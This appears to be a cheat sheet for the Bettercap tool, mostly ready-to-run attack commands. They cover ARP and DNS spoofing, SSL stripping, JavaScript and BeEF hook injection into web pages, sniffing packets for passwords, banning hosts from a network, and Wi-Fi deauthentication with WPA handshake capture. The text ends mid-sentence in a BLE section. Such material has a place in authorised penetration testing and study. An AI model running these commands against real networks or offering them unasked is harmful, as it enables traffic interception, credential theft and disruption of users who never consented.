The net.recon module performs passive scanning and is on by default, but it may not discover active devices that are not sending ARP messages while Bettercap is running. Bettercap also includes an active scanning feature in the net.probe module. Bettercap's net.probe module will continually send UDP packets to all hosts on the network. Bettercap sends the UDP activity in the form of four common protocols: NetBIOS Name Service (NBNS) discovery, Multicast DNS (MDNS), Universal Plug-and-Play (UPNP), and Web Services Discovery (WSD).
turn active host discovery on/off
net.probe on/off
Running the net.probe module for several seconds will typically reveal many more host discoveries than the net.recon module will discover. During the active discovery, or after stopping the discovery, you can examine information about discovered hosts using the net.show command.
Sniffing
turn packet sniffing on/off
net.sniff on/off
set verbose
set net.sniff.verbose true/false
If true it will consider packets from/to this computer, otherwise it will skip them.
set net.sniff.local true/false
save packets to a file
set net.sniff.output [filename]
examine packet sniffer status
net.sniff stats
add source pcap file to read
set net.sniff.source [filename]
extract matching regex from packet payloads
set net.sniff.regexp [regex]
set a protocol filter for sniffer output
set net.sniff.filter not arp
set net.sniff.filter dhcp
Password Sniffing
set net.sniff.local true
set net.sniff.regexp '.*password=.+'
set net.sniff.verbose 'true'
set net.sniff.output βpasswords.pcapβ
You could use predefined caplet http-req-dump.cap:
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.10"
# to make it less verbose
# events.stream off
# discover a few hosts
net.probe on
sleep 1
net.probe off
# uncomment to enable sniffing too
set net.sniff.verbose false
set net.sniff.local true
set net.sniff.filter tcp port 443
net.sniff on
# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear
# go ^_^
http.proxy on
https.proxy on
arp.spoof on
When user opens HTTP website, for instance time.com, hook will be executed
Bettercap + BeFF Hook
Fuzzing
In addition to packet-sniffing capabilities, Bettercap also can mutate packets for network protocol fuzzing using the net.fuzz module. By default, the net.fuzz module will mutate 100% of packets transmitted by Bettercap, mutating 40% of the packet payload data. You can adjust these values by changing the net.fuzz.rate and net.fuzz.ratio parameters.
set net.show.meta true
syn.scan [ip range] [start port] [end port]
stop scan
syn.scan stop
show progress
syn.scan.progress
show results
//net.show
Ticker Commands
The Bettercap ticker allows you to specify a collection of commands to run at a fixed frequency, which is great for monitoring the network or periodically scanning for new network targets.
ticker on/off
set ticker.commands "list; of; commands"
#example:
set ticker.period 10
set ticker.commands "clear; net.show; events.show 20 "
ARP Spoof
start ARP spoof
arp.spoof on/off
# Specify a list of target IP addresses, comma-separated
set arp.spoof.targets [IPs]
run ARP spoof in ban mode (targets connection wont work )
arp.ban on/off
run full duplex ARP spoof (both target and gateway will be attacked)
if the gateway has ARP spoof protection the attack will fail
set arp.spoof.fullduplex true/false
# example:
# Ban the address 192.168.1.6 from the network:
set arp.spoof.targets 192.168.1.6; arp.ban on
# Spoof 192.168.1.2, 192.168.1.3 and 192.168.1.4
set arp.spoof.targets 192.168.1.2-4; arp.spoof on
Ban Target From Network
set arp.spoof.targets <TARGET_IP>
arp.ban on
DNS Spoof
Set the dns.spoof.address for the host that you want to receive client activity stemming from spoofed responses. Set dns.spoof.domains to a comma-separated list of all the domains you want to target for DNS spoofing, or set dns.spoof.all to true to spoof all DNS responses. Alternatively, you can target your attack by setting dns.spoof.hosts to a hosts file that uses a specific hostname-to-IP-address pairing (using the same configuration of the standard /etc/hosts file on UNIX systems).
dns.spoof on/off
Set the IP address to return for spoofed DNS answers
set dns.spoof.address [address]
Set a list of domain targets for DNS spoofing, comma- separated list
set dns.spoof.domains [domain]
Perform DNS spoofing for all requests regardless of domain, hosts file
set dns.spoof.all true/false
Perform DNS spoofing only for the entries mapped in the specified hosts file
set dns.spoof.hosts [hostsfile]
DHCPv6 Spoof
dhcp6.spoof on/off
NDP Spoof
ndp.spoof on/off
Custom Proxy
turn any proxy on/off
any.proxy on/off
# set interface for redirection
set any.proxy.iface <interface name>
# set protocol
set any.proxy.protocol TCP/UDP
# set port
set any.proxy.src_port 80
# set source address
set any.proxy.src_address [ip]
# set dest address
set any.proxy.dst_address [ip]
# set dst port
set any.proxy.dst_port [port]
TCP Proxy
tcp.proxy on/off
HTTP Proxy
http.proxy on/off
enable SSL strip attack
set http.proxy.sslstrip true/false
URL, path or js code to inject into every HTML page
http.proxy.injectjs
set http.proxy.script /root/Desktop/Hook.js
# example:
# Will ARP spoof the whole network,
# enable sslstrip and inject a
# βHello Worldβ javascript alert
# to every HTML page being visited:
set http.proxy.injectjs alert("Hello World")
set http.proxy.sslstrip true
http.proxy on
arp.spoof on
HTTPS Proxy
A full featured HTTPS transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all HTTPS traffic will be redirected to it and it will automatically handle port redirections as needed.
When a new TLS connection is being proxied, bettercap will fetch the original certificate from the target host and resign on the fly the full chain using its own CA.
https.proxy on/off
enable SSL strip attack
set https.proxy.sslstrip true/false
inject js code
https.proxy.injectjs
set https.proxy.script /root/Desktop/Hook.js
Wifi Network Monitoring
wifi.recon covers both 2.4 Ghz and 5Ghz frequencies. Itβs doing everything you need. Deauth, Sniff, Handshake captures. To start, add -iface option:
bettercap -iface wlan0
In case of an error: Canβt restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor). Please adjust manually. Quit bettercap and manually set the wireless interface to monitor mode. For example, as follows:
$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up
Turn on recon:
wifi.recon on
You can manage channels with:
wifi.recon.channel 10,11
To clear them:
wifi.recon.channel clear
Results can be seen with:
wifi.show
To capture handshakes, we should define a sniffer, filter specific frames (0x888e), set the output file for processing later on, maybe select the channel and or target:
Β» set net.sniff.verbose true
Β» set net.sniff.filter ether proto 0x888e
Β» set net.sniff.output /root/wpa.pcap
Β» net.sniff on
Β» wifi.recon.channel 1
Β» wifi.recon on
Β» wifi.recon 94:33:30:a6:2b:63
Then we should hit it with the Deauth. You can deauth all clients with:
wifi.deauth AP-BSSID
or just specific one:
wifi.deauth CLIENT-BSSID
When you capture the handshake, you can start breaking them. Weβll not cover that here.
BLE (Bluetooth Low Energy device discovery)
The ble.recon will discovery every BLE device you want to inspect with ble.enum or playaround with ble.write.
To connect, enumerate and read characteristics from the BLE device 04:ff:de:ff:be:ff:
ble.enum 04:ff:de:ff:be:ff
Write the bytes ff ff ff ff ff ff ff ff to the BLE device 04:ff:de:ff:be:ff on its characteristics with UUID 234afbd5e3b34536a3fe72f630d4278d:
